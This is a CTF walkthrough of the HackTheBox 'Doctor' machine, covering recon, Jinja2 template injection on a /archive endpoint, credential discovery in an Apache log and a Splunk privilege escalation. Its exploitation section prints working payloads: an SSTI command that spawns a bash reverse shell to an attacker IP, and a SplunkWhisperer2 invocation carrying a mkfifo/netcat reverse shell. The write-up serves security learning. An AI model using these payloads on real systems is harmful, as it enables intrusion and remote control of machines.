Doctor

An easy Linux box from HackTheBox, get initial access via SSTI, then escalate privileges by finding a password in logfiles and using it to login to Splunk and upload a malicious app.

Recon #

Running the usual nmap

sudo nmap -sC -sV -oA nmap/init 10.10.10.209

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
|   256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_  256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Doctor
|_http-server-header: Apache/2.4.41 (Ubuntu)
8089/tcp open  ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
|_http-title: splunkd
|_http-server-header: Splunkd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

See two web servers, one on 80 and one on 8089

Going to 8089 first, see a splunked version 8.0.5, for which searchsploit returns nothing

Moving to port 80, see a regular default templated site, but upon inspection find a domain name, doctors.htb, at the end of a contact email

When going to doctors.htb, get redirected to a login page with which we can register and then login

After logging in, can post messages to a board and change our email and usernames

Since this is a CTF box and not a bug bounty, ignore any possible XXS and just go for SSTI, using the list from HackTricks

{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}

Testing each one of these on every input, creating new messages with every one, don’t find anything

Instead, opt to run a little gobuster on this new domain with the session cookie

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 40 --url http://doctors.htb -c "Cookie: session=.eJwljjtuAzEMBe-i2oX4EylfZiGJJBIYSIBduzJ89whIN2-Kh3mXI8-4vsr9eb7iVo5vL_fS6rIxOgixNfDpSTY7YVCS8GYw0irJmAxEI4Etqi9BqmKJThBBTXpjIXVGqKDogMg9AidHcgtzcWimPiFUFzl7heWwtOyQ1xXnfw3uua4zj-fvI362GDB60IwAneBu-5An61IdiCKcqcNmtvL5Ax4GPoE.YyvRFw.2f9XRRR7z63FVSXirIM0gc9O_PI"

/home                 (Status: 302) [Size: 245] [--> http://doctors.htb/login?next=%2Fhome]
/archive              (Status: 200) [Size: 101]                                            
/account              (Status: 302) [Size: 251] [--> http://doctors.htb/login?next=%2Faccount]
/logout               (Status: 302) [Size: 217] [--> http://doctors.htb/home]                 
/login                (Status: 200) [Size: 4204]                                              
/register             (Status: 200) [Size: 4493]                                             

And find an interesting endpoint “/archive”, navigating to it, find something interesting in the source, the SSTI payload {{7*7}} triggered!

Now enumerating what templater it is, use the graphic from HackTricks to figure out that it is either Jinja2 or Twig

Exploitation #

Following the guide from here, further enumerate the SSTI with

{{7*'7'}}

Which should result in 7777777, and it does - so we know its Jinja2 for sure

Now, can use the SSTI to get a reverse shell - set up the listener then create a post with this as the title and body, then go to /archive to execute it and catch the shell

{{ cycler.__init__.__globals__.os.popen('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"').read() }}

connect to [10.10.14.5] from (UNKNOWN) [10.10.10.209] 46296
bash: cannot set terminal process group (832): Inappropriate ioctl for device
bash: no job control in this shell
web@doctor:~$ whoami
web
web@doctor:~$ 

Running linpeas, find a really interesting possible privesc, python3 with the cap_sys_ptrace capability

Files with capabilities (limited to 50):
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/python3.8 = cap_sys_ptrace+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

But after spending a little too much time in this rabbit hole, move on and see that there is literally plaintext creds in a log file

Since the web user is a member of the “adm” group, have access to logs

web@doctor:/tmp$ id

uid=1001(web) gid=1001(web) groups=1001(web),4(adm)

Looking into the /var/log/ directory, see an unusual file called “backup” in the /var/logs/apache2/ directory

Printing it, see a plaintext password, Guitar123

web@doctor:/var/log/apache2$ cat backup

...
/var/log/apache2/backup:10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
...

Which is kinda weird, since its in the email field but whatever

Trying to log into splunk, now get in as shaun:Guitar123

Now googling around for splunk exploits, find a prviesc

The exploit revolves around uploading a malicious app to splunk, then executing it - not necessarily a vuln, just how splunk works

Start a listener on 9999, then run the remote version of the exploit from the kali machine since we have shauns creds

python2 SplunkWhisperer2/PySplunkWhisperer2/PySplunkWhisperer2_remote.py --host 10.10.10.209 --port 8089 --lhost 10.10.14.5 --lport 14444 --username shaun --password Guitar123 --payload "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 9999 >/tmp/f"

Catch the shell, and get root!